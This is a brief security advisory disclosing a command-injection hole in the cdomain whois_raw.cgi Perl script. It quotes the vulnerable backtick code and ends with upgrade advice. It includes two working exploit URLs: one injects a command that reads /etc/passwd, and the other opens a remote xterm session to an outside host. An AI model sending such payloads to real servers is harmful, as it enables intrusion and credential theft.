COMMAND

    whois.cgi (whois_raw.cgi)

SYSTEMS AFFECTED

    Those using cdomain 1.x, 2.x up to 2.4 (including it)

PROBLEM

    Salvatore  Sanfilippo  -antirez-  found  following.   There  is  a
    problem in whois_raw.cgi, called from whois.cgi. whois_raw.cgi  is
    part of cdomain v1.0.

        #!/usr/bin/perl
        #
        # whois_raw.cgi  Written by J. Allen Hatch (zone@berkshire.net)
        # 04/17/97
        #
        # This script is part of the cdomain v1.0 package which is available at:
        #       http://www.your-site.com/~zone/whois.html

        ...

        require ("/usr/lib/perl5/cgi-lib.pl");

        ...

        $fqdn = $in{'fqdn'};
        # Fetch the root name and concatenate
        # Fire off whois
        if ($in{'root'} eq "it") {
                @result=`$whois_cmd_it $fqdn`;
        } elsif ($in{'fqdn'} eq "alicom.com" || $in{'fqdn'} eq "alicom.org") {
                @result="Dettagli non disponibili per il dominio richiesto.";
        } else {
                @result=`$whois_cmd $fqdn`;
        }

        ...

    The exploit is banal and well known problem:

        http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
        http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

    cdomain-free 2.4 and lower are vulnerable.

SOLUTION

    The  commercial  version  (the  one  that  runs on NT too is _not_
    vulnerable since it does it's own socket thing instead of starting
    'whois'.   cdomain-free 2.5  and all  commercial cdomain  versions
    seen  are  _not_  vulnerable,  because  they  connect to the whois
    servers themselves.   cdomain-free is  available for  download  at
    www.cdomain.com.